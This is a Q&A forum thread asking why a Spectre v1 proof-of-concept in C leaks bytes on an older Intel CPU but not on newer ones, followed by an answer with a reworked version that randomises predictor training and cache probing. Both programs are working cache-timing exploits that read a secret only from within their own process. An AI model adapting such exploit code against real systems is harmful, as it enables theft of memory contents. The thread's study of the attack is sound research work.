Example of Spectre v1 on new CPU

217 views Asked by At

I know how Specter works, I found a program on GitHub that demonstrates how it works. but on my computers win 10 21h2 (i5-11400F, i5-9600K, R7-5800hs) it does not work, it only gives questions, but on i5-7500U it works also in win 10. I know that there were patches and fixes after 2018, but they all protect against access to other programs, in this case the data that the specter receives was created by the same program and therefore the protection should not affect the result. questions:

  1. can this program work on new processors?
  2. what are its parameters responsible for (why are arrays of such sizes taken)?

Code from GitHub:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt", on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {
        1,
        2,
        3,
        4,
        5,
        6,
        7,
        8,
        9,
        10,
        11,
        12,
        13,
        14,
        15,
        16
};
uint8_t unused2[64];
uint8_t array2[256 * 512];

char * secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */

void victim_function(size_t x) {
    if (x < array1_size) {
        temp &= array2[array1[x] * 512];
    }
}

/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
    static int results[256];
    int tries, i, j, k, mix_i, junk = 0;
    size_t training_x, x;
    uint64_t time1, time2;
    volatile uint8_t * addr;

    for (i = 0; i < 256; i++)
        results[i] = 0;
    for (tries = 999; tries > 0; tries--) {

        /* Flush array2[256*(0..255)] from cache */
        for (i = 0; i < 256; i++)
            _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        training_x = tries % array1_size;
        for (j = 29; j >= 0; j--) {
            _mm_clflush( & array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */
            victim_function(x);

        }

        /* Time reads. Order is lightly mixed up to prevent stride prediction */
        for (i = 0; i < 256; i++) {
            mix_i = ((i * 167) + 13) & 255;
            addr = & array2[mix_i * 512];
            time1 = __rdtsc(); /* READ TIMER */
            junk = * addr; /* MEMORY ACCESS TO TIME */
            time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
            if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
                results[mix_i]++; /* cache hit - add +1 to score for this value */
        }

        /* Locate highest & second-highest results tallies in j/k */
        j = k = -1;
        for (i = 0; i < 256; i++) {
            if (j < 0 || results[i] >= results[j]) {
                k = j;
                j = i;
            } else if (k < 0 || results[i] >= results[k]) {
                k = i;
            }
        }
        if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
            break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
    }
    results[0] ^= junk; /* use junk so code above won’t get optimized out*/
    value[0] = (uint8_t) j;
    score[0] = results[j];
    value[1] = (uint8_t) k;
    score[1] = results[k];
}

int main(int argc,
         const char * * argv) {
    size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
    int i, score[2], len = 40;
    uint8_t value[2];

    for (i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
    if (argc == 3) {
        sscanf(argv[1], "%p", (void * * )( & malicious_x));
        malicious_x -= (size_t) array1; /* Convert input value into a pointer */
        sscanf(argv[2], "%d", & len);
    }

    printf("Reading %d bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
        readMemoryByte(malicious_x++, value, score);
        printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
        printf("0x%02X=’%c’ score=%d ", value[0], (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
        if (score[1] > 0)
            printf("(second best: 0x%02X score=%d)", value[1], score[1]);
        printf("\n");
    }
    return (0);
}
1

There are 1 answers

10
taburetca On

The Specter vulnerability works also on new processors, all protections are aimed at preventing the receipt of data from other programs, but this example will work everywhere, since everything is in one program, I don’t get much into operating systems, but it is possible if the attacking program launches the program inside itself victim, then it will be possible to obtain data from the program of the victim.

Changes: I removed the excess that I considered unnecessary for the program to work, Score. I also redid the predictor training, it seems to me that in the program that was in question, the new processors predicted the cycle and optimized it, I decided to use rand so that such optimization was not possible, I did the same in the section for reading data from the cache. I also removed the

 if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0)) 
   break;

it was needed to speed up the program, but its second part seemed to me not quite right, in the end I removed it altogether, since the program already works fast enough. Well, I changed the way of setting the input data and the output data options.

#define _CRT_SECURE_NO_WARNINGS
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> // работа с кэшем win
#else
#include <x86intrin.h> //работа с кэшем
#endif
const unsigned int Time_To_Cashe = 160;
unsigned int array1_size = 5;
uint8_t trash[5] = { 1, 2, 3, 4, 5};// мусор для тренировок
uint8_t array2[256 * 512];
uint8_t temp;

void victim_function(size_t x) {//а вот и сам спектр 
  if (x < array1_size) {
    temp = array2[trash[x] * 512];
  }
}

uint8_t readMemoryByte(int cache_hit_threshold, size_t attack_x) {
  int results[256] = {0};
  int tries, i, max, sim;
  size_t train_x, x;
  register uint64_t Start, Time;
  volatile uint8_t *rd;

  for (tries = 500; tries > 0; tries--) { 
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); //удаляем из кэша array2
    /* тренирум 3 раза, на 4й атакуем, повторяем 6 раз*/
    train_x = tries % array1_size;
    for (int j = 31; j >= 0; j--) {
      _mm_clflush(&array1_size);
      x = ((rand() + 1) * (j % 4)) % 4 - 1;
      x = train_x ^ (x & (attack_x ^ train_x));// при i % 4 == 0 атакуем 
      victim_function(x);
    }
    for (i = 0; i < 256; i++) {
      sim = rand() % 256; // считываем рандомно, чтобы процессор не смог оптимизировать код,
      //ничего страшного если чтото мы прочтем несколько раз или не прочтем, из-за большого tries мы в любом случаее прочтем все 
      rd = & array2[sim * 512];

      Start = __rdtscp(rd); // замеряем время доступа
      int tmp = *rd; //обновляем addr
      Time = __rdtscp(rd) - Start;
      if ((int)Time <= cache_hit_threshold && sim != trash[train_x]) // определяем где находятся данные в кэше ил в ОЗУ
        results[sim]++; //увеличиваем встречаемость символа
    }

    max = -1;
    for (i = 0; i < 256; i++) {
      if (max < 0 || results[i] >= results[max]) {
        max = i;
      }
    }
  }
  return max;//возвращаем символ с макс частотой
}

inline void print(char c, FILE *out) {
  if (out == NULL) {
    printf("%c", c);
  }
  else {
    fprintf(out, "%c", c);
  }
}

int main(int argc, char **argv) {
  int cache_hit_threshold = Time_To_Cashe;
  const char* secret = argv[1];
  size_t malicious_x = (size_t)(secret - (char * ) trash);
  int len = strlen(secret);
  FILE* out = NULL;
  if (argc == 3) {
    out = fopen(argv[2], "w");
  }
  for (int i = 0; i < (int)sizeof(array2); i++) {
    array2[i] = 1; // заполняем 1ми, чтобы в озу не было 0
  }
   
  while (--len >= 0) {//считываем попорядку, по 1 букве
    int tmp = readMemoryByte(cache_hit_threshold, malicious_x++);
    print(tmp, out);
  }
  if (out != NULL) {
    fclose(out);
  }
  return 0;
}

I can be wrong in a lot of places, so correct me if I lied or made a mistake somewhere.